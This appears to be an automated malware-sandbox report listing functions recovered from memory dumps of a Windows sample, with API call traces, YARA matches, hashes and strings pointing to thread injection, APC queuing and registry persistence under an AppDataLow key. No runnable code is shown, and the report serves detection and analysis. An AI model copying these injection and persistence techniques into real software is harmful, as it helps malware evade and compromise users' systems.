Function 001FA3FC, Relevance: 10.6, APIs: 7, Instructions: 111librarymemoryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001F484A: GetModuleHandleA.KERNEL32(?,00000020,74183966,00000000,00000000,?,?,?,001FA418,?,00000001,?,?,00000000,00000000), ref: 001F486F

memcpy.NTDLL(00000001,?,?,?,00000001,?,?,00000000,00000000), ref: 001FA42E
memset.NTDLL ref: 001FA469
GetModuleHandleA.KERNEL32(?,003FB96D,?), ref: 001FA4A0
GetProcAddress.KERNEL32(00000000), ref: 001FA4A7
FindCloseChangeNotification.KERNELBASE(00000000), ref: 001FA4EE
GetLastError.KERNEL32 ref: 001FA4F7
HeapFree.KERNEL32(00000000,00000001), ref: 001FA513

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: HandleModule$AddressChangeCloseErrorFindFreeHeapLastNotificationProcmemcpymemset
String ID:
API String ID: 885547338-0
Opcode ID: f9f31158962c5819c576b699c2328ac2d7d06144f10c2ccb8613e5a44501e6f4
Instruction ID: c2d547df767ad0804e95b7be70bb8d19f1d38774c0ff1131bb3a052df0c9180c
Opcode Fuzzy Hash: f9f31158962c5819c576b699c2328ac2d7d06144f10c2ccb8613e5a44501e6f4
Instruction Fuzzy Hash: 3F4127B690021DFBCB11ABE4DC489FEBFB9EF48344F104455F209A3120D7759A85DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B29D35, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B26CBC: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 00B26CE1
Part of subcall function 00B26CBC: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00B26CFD

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00B29D6E
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B29E59

Part of subcall function 00B26CBC: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000000,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 00B26E67

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00B29DA4
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B29DB0
lstrcmpi.KERNEL32(?,00000000), ref: 00B29DED
StrChrA.SHLWAPI(?,0000002E), ref: 00B29DF6
lstrcmpi.KERNEL32(?,00000000), ref: 00B29E08

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
String ID:
API String ID: 3901270786-0
Opcode ID: 7c3ba9ab59a183f584c3e0636859b994e0c5b3717a67e36ee62ae099d6ddb8b7
Instruction ID: eab55f82bc95329af8090303a6d7da3030d320c4660f05e4ff3f067faa91640d
Opcode Fuzzy Hash: 7c3ba9ab59a183f584c3e0636859b994e0c5b3717a67e36ee62ae099d6ddb8b7
Instruction Fuzzy Hash: 8D315D71504321ABD321DF11EC44B6BBBE8FF89B54F110959F98CA7280CB74E948CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00B18554, Relevance: 10.6, APIs: 7, Instructions: 80sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00B24F76: memset.NTDLL ref: 00B24F80

OpenEventA.KERNEL32(00000002,00000000,00B3E130,?,00000000,00000000,?,00B215E7), ref: 00B185E4
SetEvent.KERNEL32(00000000,?,00B215E7), ref: 00B185F1
Sleep.KERNEL32(00000BB8,?,00B215E7), ref: 00B185FC
ResetEvent.KERNEL32(00000000,?,00B215E7), ref: 00B18603
CloseHandle.KERNEL32(00000000,?,00B215E7), ref: 00B1860A
GetShellWindow.USER32 ref: 00B18615
GetWindowThreadProcessId.USER32(00000000), ref: 00B1861C

Part of subcall function 00B1F792: RegCloseKey.ADVAPI32(?), ref: 00B1F815

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
String ID:
API String ID: 53838381-0
Opcode ID: 73d48cb801ddee8d7d9047d589cc6b825a2d21d3d19134d6b3c48b6c78bd4bfc
Instruction ID: 949252c82ea030870e1a7e68dc8045b642fa02b66932d07226e99c3cb0d449b1
Opcode Fuzzy Hash: 73d48cb801ddee8d7d9047d589cc6b825a2d21d3d19134d6b3c48b6c78bd4bfc
Instruction Fuzzy Hash: 2C21C332100620BBC2116B66AC89DAF7BEFFBC4760B644889F52997191CF34D841CB76

Uniqueness

Uniqueness Score: -1.00%

Function 001F6E28, Relevance: 10.6, APIs: 7, Instructions: 75COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 001F6E5A
GetTokenInformation.KERNELBASE(00000000,00000014,00000001,00000004,00000000,00000000), ref: 001F6E7A
GetTokenInformation.KERNELBASE(00000000,00000019,00000000,00000000,00000000), ref: 001F6E8A
CloseHandle.KERNEL32(00000000), ref: 001F6EDA

Part of subcall function 001F550F: RtlAllocateHeap.NTDLL(00000000,?,001F21E6), ref: 001F551B

GetTokenInformation.KERNELBASE(00000000,00000019,00000000,00000000,00000000,00000000,?), ref: 001F6EAD
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 001F6EB5
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 001F6EC5

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 67d5d27f03278cc89ed2390bb294b3376367c2c42cbab1066cf8ca157adbbb83
Instruction ID: d29d7d72f059c42b88c49501781322358f7bcf9a9ca21ee5ae1ed1193446d1e3
Opcode Fuzzy Hash: 67d5d27f03278cc89ed2390bb294b3376367c2c42cbab1066cf8ca157adbbb83
Instruction Fuzzy Hash: FE21397990021DFFEB10DFA4DC84EBEBBBAEB48304F1000A5F610A6161CB719E45EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B2E866, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B26AB9: lstrlen.KERNEL32(?,00000000,00B2EC1E,00000027,00B3E0D4,?,00000000,?,?,00B2EC1E,Local\,00000001,?,00B30C37,00000000,00000000), ref: 00B26AEF
Part of subcall function 00B26AB9: lstrcpy.KERNEL32(00000000,00000000), ref: 00B26B13
Part of subcall function 00B26AB9: lstrcat.KERNEL32(00000000,00000000), ref: 00B26B1B

RegOpenKeyExA.KERNELBASE(00B24F98,00000000,00000000,00020119,80000001,00000000,Software\AppDataLow\Software\Microsoft\,00000000,?,00B3E130,00B24F98,00B215E7,80000001,?,00B215E7), ref: 00B2E89F
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,?,00B215E7), ref: 00B2E8B3
RegCloseKey.KERNELBASE(?,?,Client32,?,?,?,00B215E7), ref: 00B2E8FC

Strings

Client32, xrefs: 00B2E8C1
Software\AppDataLow\Software\Microsoft\, xrefs: 00B2E874
Client64, xrefs: 00B2E8E5

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Open$Closelstrcatlstrcpylstrlen
String ID: Client32$Client64$Software\AppDataLow\Software\Microsoft\
API String ID: 4131162436-710576342
Opcode ID: 981c0c54a37312d9f61263338a6a7e42f23034488756fa9c8ec7d52c31ae8892
Instruction ID: 38a614281b5021386da81c729e982eaac4631d0b5b4c272652582eec81bdee2d
Opcode Fuzzy Hash: 981c0c54a37312d9f61263338a6a7e42f23034488756fa9c8ec7d52c31ae8892
Instruction Fuzzy Hash: 9111B27190022DBEDB10AFE6ED81CAFBBFDEE45314B5040B6FA18A6011D370DE449B60

Uniqueness

Uniqueness Score: -1.00%

Function 001F9A14, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 001F9A55
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,?,00000000), ref: 001F9AD7
StrStrIW.SHLWAPI(00000000,?), ref: 001F9B16
SysFreeString.OLEAUT32(00000000), ref: 001F9B38

Part of subcall function 001F736F: SysAllocString.OLEAUT32(001FC2C8), ref: 001F73BF

SafeArrayDestroy.OLEAUT32(?), ref: 001F9B8C
SysFreeString.OLEAUT32(?), ref: 001F9B9A

Part of subcall function 001F98B3: Sleep.KERNELBASE(000001F4), ref: 001F98FB

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: f318285c8edfafaff19204c30f52c1c5900dfb7eb41c0ef14a206e64e96d8480
Instruction ID: 3c545149519c4672f1d2a2823de8d671ad38d89ddaf07ba0c48e294a7662cd08
Opcode Fuzzy Hash: f318285c8edfafaff19204c30f52c1c5900dfb7eb41c0ef14a206e64e96d8480
Instruction Fuzzy Hash: 3951107690020DEFDB10DFA4D884DBEB7B6FF88350B148969E605EB220DB719D46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B218D2, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B218F5

Part of subcall function 00B233D3: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00B14655,00000000), ref: 00B233EE
Part of subcall function 00B233D3: IsWow64Process.KERNEL32(?,?,?,?,?,?,00B14655,00000000), ref: 00B233FF
Part of subcall function 00B233D3: FindCloseChangeNotification.KERNELBASE(?,?,?,?,00B14655,00000000), ref: 00B23412

ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,73B74EE0,00000000), ref: 00B219AF
WaitForSingleObject.KERNEL32(00000064), ref: 00B219BD
SuspendThread.KERNEL32(00000004), ref: 00B219D0

Part of subcall function 00B27579: memset.NTDLL ref: 00B2783B

ResumeThread.KERNELBASE(00000004), ref: 00B21A53

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Thread$ProcessResumememset$ChangeCloseFindNotificationObjectOpenSingleSuspendWaitWow64
String ID:
API String ID: 2336522172-0
Opcode ID: 6578f945b795ebe299c8b933e96e61c50194f6a2ce1e9b23761174ae32748fe3
Instruction ID: 97dbfb9623fb3325221d22497b747d1fa2333b4507a9874b07f575085baf9f4f
Opcode Fuzzy Hash: 6578f945b795ebe299c8b933e96e61c50194f6a2ce1e9b23761174ae32748fe3
Instruction Fuzzy Hash: 8F41DE31900228AFDF119F98EC85AAE7BF9FF14340F1448A5F919A7160CB30DE95CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B1FFED, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00B3D514,?,00B3A578,00000018,00B23B8C,00000000,00000002,00B3D518,00000000,00B3D514,00000000), ref: 00B20030
VirtualProtect.KERNELBASE(00000000,00000004,?,?,00000000,00000004,?,00000000,?,?,?,00B3D514,?,00B3A578,00000018,00B23B8C), ref: 00B200BB
RtlEnterCriticalSection.NTDLL(00B3E240), ref: 00B200E3
RtlLeaveCriticalSection.NTDLL(00B3E240), ref: 00B20101

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: 7559095ef8b4714500a48f0df68df521a06c9b09c799abf7cf54bfc9ac3518c6
Instruction ID: 859b915e317db43d0d2053199ff203cf6462e8dd0f68abe46005d77718e4d013
Opcode Fuzzy Hash: 7559095ef8b4714500a48f0df68df521a06c9b09c799abf7cf54bfc9ac3518c6
Instruction Fuzzy Hash: D5417B70900719EFDB11EF65D880A9EBBF4FF08300B20859AF919A7261DB70AA50CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B245CA, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,00B11440,?,?,?,?,00B27689,?,?,00000000,?,00000B54), ref: 00B245EF
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00B24611
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00B24627
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00B2463D
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00B24653
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00B24669

Part of subcall function 00B1E010: NtCreateSection.NTDLL(00000000,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 00B1E06D
Part of subcall function 00B1E010: memset.NTDLL ref: 00B1E091

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: 3c95ade4b6257b6a617d54bb96858b2a006d44a4381dc334af0fda674a0db824
Instruction ID: 14289910f31e19befb623ac84117e0e0e71647ed4e660318d17347dd0b150a52
Opcode Fuzzy Hash: 3c95ade4b6257b6a617d54bb96858b2a006d44a4381dc334af0fda674a0db824
Instruction Fuzzy Hash: 412191B150071ADFD720DF68DC84EAA77ECEB0834471108A6E90CCB651EB70E909CB70

Uniqueness

Uniqueness Score: -1.00%

Function 001F4FE9, Relevance: 9.1, APIs: 6, Instructions: 75memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(001FC068,?,00000000,?,001FC068), ref: 001F501D
StrStrA.SHLWAPI(00000000,?), ref: 001F502A
RtlAllocateHeap.NTDLL(00000000,?), ref: 001F5049
memcpy.NTDLL(00000000,0000000B,0000000B), ref: 001F505D
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 001F506C
memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 001F5087

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 0bd21be629207ac511dcc152f0c0c905c8aad0403b612c13db26b6a8cc862974
Instruction ID: 191f27c2f97172e151d122cab5d24780227ed3b6ec1035dcee760a6505abb227
Opcode Fuzzy Hash: 0bd21be629207ac511dcc152f0c0c905c8aad0403b612c13db26b6a8cc862974
Instruction Fuzzy Hash: 94218E3690050DAFCF018F68DC88AAEBFBAEF95300F058155FD04A7215DB319955CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001F6D4A, Relevance: 9.1, APIs: 6, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,001F7115,?,?,?,00000001,001FD238,00000000,?), ref: 001F6D56
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 001F6D6C
CreateFileMappingW.KERNELBASE(000000FF,001FD234,00000004,00000000,00001000,?,?,?,?,54D38000,00000192), ref: 001F6DAD
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,54D38000,00000192,?,?,?,?,?,001F7115), ref: 001F6DD6
CloseHandle.KERNEL32(00000000,?,?,?,54D38000,00000192,?,?,?,?,?,001F7115,?,?,?,00000001), ref: 001F6DF7
GetLastError.KERNEL32(?,?,?,54D38000,00000192,?,?,?,?,?,001F7115,?,?,?,00000001,001FD238), ref: 001F6DFF

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView_aulldiv
String ID:
API String ID: 1732207917-0
Opcode ID: 5aaa34184f3aa3655f6e25998dc61c2d4288cd01078edfef79924a64147646fd
Instruction ID: 85898a7550b4fc5176f7302911da7e7503e99b21252346c9be8a5f3c0e0ffae9
Opcode Fuzzy Hash: 5aaa34184f3aa3655f6e25998dc61c2d4288cd01078edfef79924a64147646fd
Instruction Fuzzy Hash: FC21C0BA64020CFBD711EB98DD05FBA77A9AB44740F250120F705E71D0DB709946DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B2C0AB, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,00B1402D), ref: 00B2C0C2
QueueUserAPC.KERNELBASE(?,00000000,?,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B2C0D7
GetLastError.KERNEL32(00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B2C0E2
TerminateThread.KERNEL32(00000000,00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B2C0EC
CloseHandle.KERNEL32(00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B2C0F3
SetLastError.KERNEL32(00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B2C0FC

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: e4e27f049d508418fa8635388bc83e1ad5f4b91a7dc6f6f7c88189a4b3539fef
Instruction ID: ab9eb7ba6ec34468ba5f682108c61d4f67a8a2aa2b4dcd20d1c4e357a920122d
Opcode Fuzzy Hash: e4e27f049d508418fa8635388bc83e1ad5f4b91a7dc6f6f7c88189a4b3539fef
Instruction Fuzzy Hash: 5BF01232145720BBD6625B60AC49F5FBF69FB09762F204404FB09A3160CF7589159BA3

Uniqueness

Uniqueness Score: -1.00%

Function 001F8760, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173stringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(001F262A,0000005F,00000000,00000000,00000104), ref: 001F8793
memcpy.NTDLL(?,001F262A,?), ref: 001F87AC
lstrcpy.KERNEL32(?), ref: 001F87C2

Part of subcall function 001F8DEA: lstrlen.KERNEL32(?,?,?,?,001F2376,?), ref: 001F8DF3
Part of subcall function 001F8DEA: mbstowcs.NTDLL ref: 001F8E1A
Part of subcall function 001F8DEA: memset.NTDLL ref: 001F8E2C

Part of subcall function 001F63AB: lstrlenW.KERNEL32(001F262A,?,?,001F8936,3D001FC0,80000002,001F262A,001F2829,?,?,001F2829,?,3D001FC0,80000002,001F262A,?), ref: 001F63CB

Part of subcall function 001FA07B: RtlFreeHeap.NTDLL(00000000,?,001F2292,?), ref: 001FA087

lstrcpy.KERNEL32(?,00000000), ref: 001F87E4

Strings

\, xrefs: 001F87C8

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
String ID: \
API String ID: 2598994505-2967466578
Opcode ID: cf2250adb4bc9b0e41bc23018c43381877dcd0b420176382221eb30e61e1121b
Instruction ID: 49363250e63030ed20317050699e24776a098a57db8d53f1a48520bc596bb942
Opcode Fuzzy Hash: cf2250adb4bc9b0e41bc23018c43381877dcd0b420176382221eb30e61e1121b
Instruction Fuzzy Hash: 8951677250020EEFDF11AFA0EC45EBA7BBAFF54348F108514FA15A2161DB31DA61EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B2E65F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memcpy.NTDLL(00B3E130,73B74D40,00000018,00000001,00000000,73B74D40,00B27CD1,?,?), ref: 00B2E675
GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,00000000,73B74D40,00B27CD1,?,?), ref: 00B2E69A
GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 00B2E6AA

Strings

KERNEL32.DLL, xrefs: 00B2E6A5
NTDLL.DLL, xrefs: 00B2E683

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HandleModule$memcpy
String ID: KERNEL32.DLL$NTDLL.DLL
API String ID: 1864057842-633099880
Opcode ID: ad07b358d4b93a99c2a54e26c368938e6305af34bdd3106ace5f7bd2947bd5f2
Instruction ID: cf9a1dee6e21384b5a128e39bfd54c41d23a0821317f8d5e64f170e16238e708
Opcode Fuzzy Hash: ad07b358d4b93a99c2a54e26c368938e6305af34bdd3106ace5f7bd2947bd5f2
Instruction Fuzzy Hash: 4401D672600321ABE7119F5AFC81B5A76D4E7B4700F3405BBF568930E0CAB0D884CB52

Uniqueness

Uniqueness Score: -1.00%

Function 001F707F, Relevance: 7.7, APIs: 5, Instructions: 191memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001F286D: GetModuleHandleA.KERNEL32(?,00000000,001F7098,00000000,00000000,00000000,?,?,?,?,?,001F258B), ref: 001F287C

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,001FD238,00000000), ref: 001F7103
CloseHandle.KERNEL32(?,?,?,?,00000001,001FD238,00000000,?,?,?,?,?,?,?,001F258B), ref: 001F711C
memset.NTDLL ref: 001F71CC
RtlInitializeCriticalSection.NTDLL(001FD294), ref: 001F71DD
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 001F7206

Part of subcall function 001F8B98: GetUserNameW.ADVAPI32(00000000,001F725B), ref: 001F8BCF
Part of subcall function 001F8B98: GetUserNameW.ADVAPI32(00000000,001F725B), ref: 001F8BF3
Part of subcall function 001F8B98: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,001F725B,?,?,?,?,?,001F258B), ref: 001F8C14
Part of subcall function 001F8B98: HeapFree.KERNEL32(00000000,00000000), ref: 001F8C7A

Part of subcall function 001F550F: RtlAllocateHeap.NTDLL(00000000,?,001F21E6), ref: 001F551B

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: Heap$AllocateDescriptorFreeHandleNameSecurityUser$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 3243188989-0
Opcode ID: 083a9819b196a7190774fecb67fbd7ac005b85ddf2d5857dce41ccf9685f2a09
Instruction ID: baa208b3ba488868c910518bcc3455b5528515591a8aa47135947e97f01d750b
Opcode Fuzzy Hash: 083a9819b196a7190774fecb67fbd7ac005b85ddf2d5857dce41ccf9685f2a09
Instruction Fuzzy Hash: 3751D1B194421DABDB20EBA8ED49BBE73BAAB54700F150015FA05E7290DB70DD81DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 001F50B5, Relevance: 7.6, APIs: 5, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 001FA090: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,001FD11C,001F987E,?,00000000,?,00000000,?,?,001F726B), ref: 001FA0C6
Part of subcall function 001FA090: lstrcpy.KERNEL32(00000000,00000000), ref: 001FA0EA
Part of subcall function 001FA090: lstrcat.KERNEL32(00000000,00000000), ref: 001FA0F2

CreateEventA.KERNEL32(001FD234,00000001,00000000,00000000,?,00000001,00000000,00000001,?,00000000,?,001F2649,?,00000001,?), ref: 001F50F4

Part of subcall function 001FA07B: RtlFreeHeap.NTDLL(00000000,?,001F2292,?), ref: 001FA087

StrChrW.SHLWAPI(001F2649,00000020,?,00000001,00000000,00000001,?,00000000,?,001F2649,?,00000001,?), ref: 001F5124
WaitForSingleObject.KERNEL32(00000000,00004E20,001F2649,00000000,?,00000000,?,001F2649,?,00000001,?,?,?,?,001F9D1C,?), ref: 001F5152
WaitForSingleObject.KERNEL32(00000000,00004E20,?,00000001,00000000,00000001,?,00000000,?,001F2649,?,00000001,?), ref: 001F5180
CloseHandle.KERNEL32(00000000,?,00000001,00000000,00000001,?,00000000,?,001F2649,?,00000001,?,?,?,?,001F9D1C), ref: 001F5198

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: c9316a56d1b5f25b1ef20a0c2fb20d5017dbcc390df0c90997d45d989dc631cf
Instruction ID: a21cb0d5c103230fe17fba3e0c1953fbd35dcf4cefb2a16e73ce6f1bf7c5cca7
Opcode Fuzzy Hash: c9316a56d1b5f25b1ef20a0c2fb20d5017dbcc390df0c90997d45d989dc631cf
Instruction Fuzzy Hash: EB212732605B1EABD7215B68AD44B3B73EBAF58751F090624FF06D7290DB70EC418690

Uniqueness

Uniqueness Score: -1.00%

Function 00B2672D, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1810A: RegCreateKeyA.ADVAPI32(80000001,05778900,?), ref: 00B1811F
Part of subcall function 00B1810A: lstrlen.KERNEL32(05778900,00000000,00000000,?,?,00B279A9,00000000,?), ref: 00B1814D

RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00B11CDF,00000000,00000000,?,?,00000000,?,?,?,00B11CDF,TorClient), ref: 00B26765
RtlAllocateHeap.NTDLL(00000000,00B11CDF), ref: 00B26779
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00B11CDF,?,?,?,00B11CDF,TorClient,?,?), ref: 00B26793
HeapFree.KERNEL32(00000000,00B11CDF,?,?,?,00B11CDF,TorClient,?,?), ref: 00B267AF
RegCloseKey.KERNELBASE(?,?,?,?,00B11CDF,TorClient,?,?), ref: 00B267BD

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 1633053242-0
Opcode ID: 695f1e61d737cc41a23882fa1ce0ecc154c63fe576be3d82312a80222bfb6f1b
Instruction ID: 36598e17cf8e8830d4f84f70550466e474632d51750db414a8eef521b752ea54
Opcode Fuzzy Hash: 695f1e61d737cc41a23882fa1ce0ecc154c63fe576be3d82312a80222bfb6f1b
Instruction Fuzzy Hash: EA1119B6500119FFDB019FA4ECC4CAE7BBEFB88358B210466F90593160EB719D559B60

Uniqueness

Uniqueness Score: -1.00%

Function 00B35277, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,?,?,00B1619F,00000004,00000000,?,00000000,00B1B275), ref: 00B3529C
GetLastError.KERNEL32(?,00000000,00000000,?,?,00B1619F,00000004,00000000,?,00000000,00B1B275,?,?), ref: 00B352A4
VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,?,?,00B1619F,00000004,00000000,?,00000000,00B1B275,?,?), ref: 00B352BB
VirtualProtect.KERNEL32(?,00000000,-392CC87E,00000004,?,00000000,00000000,?,?,00B1619F,00000004,00000000,?,00000000,00B1B275,?), ref: 00B352E0
SetLastError.KERNEL32(00000000,?,00000000,00000000,?,?,00B1619F,00000004,00000000,?,00000000,00B1B275,?,?), ref: 00B352E9

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Virtual$ErrorLastProtect$Query
String ID:
API String ID: 148356745-0
Opcode ID: 70bab07fde5cb5b7bce50037feceb9a79dec907c769647629be5123162af2118
Instruction ID: 460abed194b5a7fbbf99f583b0b146f089f0594d4dedf16a81f073baf70683f5
Opcode Fuzzy Hash: 70bab07fde5cb5b7bce50037feceb9a79dec907c769647629be5123162af2118
Instruction Fuzzy Hash: 6C01483250020AAF9F119FA9DC8089EBBFDFF08354B108026F906A3160DB71D9559BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B11300, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B1132E
ResumeThread.KERNELBASE(?,?,?,?,?,00000004,?), ref: 00B113B8
WaitForSingleObject.KERNEL32(00000064,?,?,?,?,00000004,?), ref: 00B113C6
SuspendThread.KERNELBASE(?,?,?,?,?,00000004,?), ref: 00B113D9

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: bfd8d880db04c75425efb6f72b39f291bfc904ce1e3e3265cc5f6478b8037506
